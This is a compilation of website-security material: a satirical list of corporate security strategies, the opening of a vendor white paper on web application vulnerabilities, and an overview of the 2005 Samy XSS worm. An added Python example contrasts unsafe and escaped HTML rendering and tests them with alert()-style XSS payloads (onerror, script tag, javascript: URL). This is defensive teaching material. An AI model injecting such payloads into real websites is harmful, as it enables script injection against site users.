Incident Response (aka: public relations)
Ensure that the exact types of previous break-ins, that have also been publicly attributed to the organization, will (hopefully) never happen again. Organize a set of public relations talking points for media inquiry in case it does.

Compliance (aka: satisfy the checkbox)
Satisfy audit requirements for any/all applicable regulations where failure will result in significant business loss. Ignore the rest until they do. Decisions on whether a particular security safeguard is required should be left to the discretion of the on-site auditor, but only after appropriate organizational push back.

Risk Management (aka: control-based)
Implement minimum industry accepted best-practices controls that establish a defensible due diligence posture in the event of incident or public inquiry. Engage with a well-known security consultancy that may positively attest to your organizations adherence via a thorough risk assessment.

Business Continuity (aka: keep the boss happy)
Address any security issues that have previously inhibited management's ability to use email or view online adult entertainment. Other outstanding risks are considered secondary and should be revisited periodically by the security steering committee.

Threat-based
Identify and categorize the various threat agents that must be successfully defended against. Actively monitor threat agent activity, implement security controls that limit their capabilities, and generate business-level activity reports.

Competitive Advantage (aka: customer-based)
Obtain a list of essential security controls from key customers/prospects, competitor technical literature, and provide assurance to customers that these highest standards of due care have been implemented.

Obviously many of these descriptions are meant to be humorous while still bearing some resemblance to today's organizational reality. Most organizations adopt more than a single strategy to form their own unique hybrid approach to information security.


10 Things You Should Know about Website Security


Phishing schemes. Stolen credit card numbers. Identity theft. Websites have emerged as the target of choice for money hungry hackers. Attacks have moved from the network layer to the Web application layer that people use to manage their lives everyday: online shopping and banking, healthcare information management, insurance payments, travel booking and college applications.
The ramifications for companies are clear: Loss of data, loss of consumer confidence and loss of brand integrity. No company can afford the black mark of a website hack. With many states mandating full disclosure, and the federal government close behind with its own efforts, the luxury of keeping these incidents behind closed doors has passed. Organizations must develop a strategy for complete website vulnerability management.
How can companies prevent these attacks? The first step is to understand the fundamentals. This white paper will examine ten vital website security issues that affect software developers and information security professionals. Grasping these points will enable companies to understand the scope of the problem, and establish realistic approaches for vulnerability management and securing their websites. Consider these ten points a springboard for further exploration of website security so that your organization and customers can avoid being victimized.

Ten Things You Should Know about Website Security

1. The Network Perimeter is Vanishing

Companies can no longer tout a locked down perimeter as the ultimate defense. Hundreds of millions of people worldwide use the Internet to bank, shop, purchase goods and services, and perform research. With each transaction, private information, including names, addresses, phone numbers, credit/debit card numbers, and passwords, is routinely transferred and stored in a variety of locations. To enable this flow of information, organizations must open up their firewalls, the very devices once thought to offer impenetrable protection. Billions of dollars and millions of personal identities and private information are exposed to hackers who find their way in through security vulnerabilities in custom Web applications.
From a security perspective, firewalls and SSL offer little protection. Web traffic often contains attacks such as Cross-Site Scripting (XSS) and SQL Injection that enter through Port 80 and are not blocked by the firewall. Contrary to a popular market misconception, SSL is not capable of securing a website, but instead is tasked with safeguarding data in transit. Once data is on the Web server, it can be compromised whether or not SSL is in use.
Website security is a specialized practice that focuses solely on the custom Web applications that sit on corporate Web servers. Network scanning covers packaged, off-the-shelf applications. Applications developed in-house (the vast majority of websites) need custom security to fend off the attacks that bypass the network perimeter.

2. Over 80% of Websites have Security Vulnerabilities

Consider the fact that 8 out of 10 websites visited each day have a serious security vulnerability that puts corporate and customer data at risk. Add to that the irreparable harm done to a company whose brand is compromised by a publicized attack. It’s a call to action for any company doing any of its business on the Web.
WhiteHat Security, through its unique vulnerability management service, assesses the security of some of the largest and most visible websites in the e-commerce, financial services, and healthcare industries. Based on the aggregate data of thousands of website assessments, we've determined that over 80% of websites have vulnerabilities. These vulnerabilities enable a hacker to access customer account data, execute administrative-level functions, defraud the business, or halt operations, all serious business impacts.
Website vulnerabilities fall into twenty-four classes, as determined by the Web Application Security Consortium (WASC). Within those classes, there are vulnerabilities from the common, like SQL Injection and Cross-Site Scripting, to the obscure, like Abuse of Functionality and Insufficient Process Validation. The most important thing to remember here is that when you’re talking about custom Web application vulnerabilities, they will be unique to your website. And, it takes a joint effort between the development and security teams to identify and resolve issues.

Cross Site Scripting (XSS) Worms and Viruses

Website Security Whitepaper


On October 4, 2005, the "Samy Worm" became the first major worm to use Cross-Site Scripting ("XSS") for infection propagation. Overnight, the worm altered over one million personal user profiles on MySpace.com, the most popular social networking site in the world. The worm infected the site with viral JavaScript code and made Samy, the hacker, everyone's pseudo "friend" and "hero." MySpace, at the time home to over 32 million users and a top-10 trafficked website in the U.S. (based on Alexa rating), was forced to shut down in order to stop the onslaught.
Samy, the author of the worm, was on a mission to be famous, and as such the payload was relatively benign. But, consider what he might have done with control of over one million Web browsers and the gigabits of bandwidth at their disposal – browsers that were also potentially logged-in to Google, Yahoo, Microsoft Passport, eBay, Web banks, stock brokerages, blogs, message boards, or any other custom Web applications. It’s critical that we begin to understand the magnitude of the risk associated with XSS malware and the ways that companies can defend themselves and their users, especially when the malware originates from trusted websites and aggressive authors.

In this white paper we will provide an overview of XSS; define XSS worms; and examine propagation methods, infection rates, and potential impact. Most importantly, we will outline immediate steps enterprises can take to defend their websites.
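As an added example (not from the whitepaper), here is the defence side in code: a profile renderer of the kind a community site uses, first in the vulnerable form that interpolates stored user data straight into markup, which is all a worm like Samy's needs, then hardened with context-appropriate output encoding and a URL scheme allowlist for the homepage link. A small checker built on the standard library's HTML parser reports what a browser would actually execute, so escaped text is not mistaken for live markup. Field names and payloads are constructed for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Added illustration: a profile renderer like the ones on the community sites the paper
# describes. Field names and payloads are constructed, not taken from the MySpace worm.

TEMPLATE = '<h1>%s</h1><div class="bio">%s</div><a href="%s">homepage</a>'


def render_profile_unsafe(display_name, bio, homepage):
    """Vulnerable: user-controlled strings are dropped straight into HTML. Whatever a user
    stores in these fields runs in every visitor's browser, which is all an XSS worm needs."""
    return TEMPLATE % (display_name, bio, homepage)


def safe_url(url):
    """Allow only absolute http(s) URLs. Rejects javascript:, data:, vbscript: and
    attribute break-outs; the caller still attribute-escapes whatever survives."""
    url = url.strip()
    try:
        parsed = urlparse(url)
    except ValueError:
        return "#"
    if parsed.scheme.lower() in ("http", "https") and parsed.netloc:
        return url
    return "#"


def render_profile_safe(display_name, bio, homepage):
    """Hardened: html.escape (quote=True by default) for the element-body context, and a
    scheme allowlist plus attribute escaping for the href context."""
    return TEMPLATE % (html.escape(display_name), html.escape(bio), html.escape(safe_url(homepage)))


class ScriptFinder(HTMLParser):
    """Records script elements, on* event-handler attributes and javascript: links as a
    browser would see them; escaped text never reaches handle_starttag."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("<script>")
        for name, value in attrs:
            if name.startswith("on"):
                self.hits.append(name)
            elif name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.hits.append(name + "=javascript:")


def script_vectors(rendered):
    """The executable vectors present in a rendered page (empty list means none)."""
    finder = ScriptFinder()
    finder.feed(rendered)
    return finder.hits


if __name__ == "__main__":
    bio = '<img src=x onerror="alert(1)"><script>alert(2)</script>'
    print("unsafe:", script_vectors(render_profile_unsafe("samy", bio, "javascript:alert(3)")))
    print("safe:  ", script_vectors(render_profile_safe("samy", bio, "javascript:alert(3)")))
```

Escaping is context-specific: `html.escape` is right for element bodies and quoted attribute values, but a URL attribute additionally needs the scheme check, and data placed inside a script block or a CSS property would need its own encoder again. The worm described above lived in exactly such a secondary context (a style attribute), which is why escaping for one context is not a complete fix.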

10 Quick Facts About XSS Viruses and Worms:
What You Need to Know Now

XSS Outbreaks:

  1. Are likely to originate on popular websites with community-driven features such as social networking, blogs, user reviews, message boards, chat rooms, Web mail, and wikis.
  2. Can occur at any time because the vulnerability (Cross-Site Scripting) required for propagation exists in over 80% of all websites.
  3. Are capable of propagating faster and cleaner than even the most notorious worms such as Code Red, Slammer and Blaster.
  4. Could create a Web browser botnet enabling massive DDoS attacks. The potential also exists to damage data, send spam, or defraud customers.
  5. Maintain operating system independence (Windows, Linux, Macintosh OS X, etc.), since execution occurs in the Web browser.
  6. Circumvent network congestion by propagating in a Web server-to-Web browser (client-server) model rather than a typical blind peer-to-peer model.
  7. Do not rely on Web browser or operating system vulnerabilities.
  8. May propagate by utilizing third-party providers of Web page widgets (advertising banners, weather and poll blocks, JavaScript RSS feeds, traffic counters, etc.).
  9. Will be a challenge to spot because the network behavior of infected browsers remains relatively unchanged and the JavaScript exploit code is hard to distinguish from normal Web page markup.
  10. Are easier to stop than traditional Internet viruses because denying access to the infectious website will quarantine the spread.